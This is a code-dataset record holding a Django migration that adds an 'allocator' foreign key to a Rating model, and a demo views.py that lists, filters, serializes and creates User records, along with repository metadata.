# Generated by Django 2.2 on 2019-05-13 07:42
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('main', '0008_rating_student'),
]
operations = [
migrations.AlterModelOptions(
name='rating',
options={'get_latest_by': ['created_at', 'updated_at']},
),
migrations.AddField(
model_name='rating',
name='allocator',
field=models.ForeignKey(default='', on_delete=django.db.models.deletion.CASCADE, related_name='allocator', to='main.Student'),
preserve_default=False,
),
migrations.AlterField(
model_name='rating',
name='student',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='student', to='main.Student'),
),
]
|
[
"abeatson411@gmail.com"
] |
abeatson411@gmail.com
|
71dbbc03c5f68546fa67b47b295fd61eefcc15bd
|
6edf174b5b94c65e5caea4e32ce819492b875c38
|
/Django/ajax_demo/apps/demo_app/views.py
|
7d8ab1e482243e1134752bbd184add9bd77e6970
|
[] |
no_license
|
sec2890/Python
|
fc7f27f9d89962f26b1e318499235b0148394422
|
6796b3048fe11280fd81f7abed49f900fd34d518
|
refs/heads/master
| 2020-06-09T07:34:57.698322
| 2019-06-23T23:22:04
| 2019-06-23T23:22:04
| 193,401,872
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,036
|
py
|
from django.shortcuts import render, HttpResponse, redirect
from django.contrib import messages
from .models import *
from django.core import serializers
def index(request):
return render(request, "demo_app/index.html")
def all_json(request):
users = User.objects.all()
users_json = serializers.serialize("json", users)
print (users_json)
return HttpResponse(users_json, content_type='application/json')
def all_html(request):
users = User.objects.all()
return render(request, "demo_app/all.html", {"users": users})
def find(request):
users = User.objects.filter(first_name__startswith=request.POST['first_name_starts_with'])
print(users)
return render(request, "demo_app/all.html", {"users": users})
def create(request):
User.objects.create(first_name=request.POST['first_name'], last_name=request.POST['last_name'], email_address=request.POST['email_address'])
users = User.objects.all()
return render(request, "demo_app/all.html", {"users": users})
|
[
"noreply@github.com"
] |
sec2890.noreply@github.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.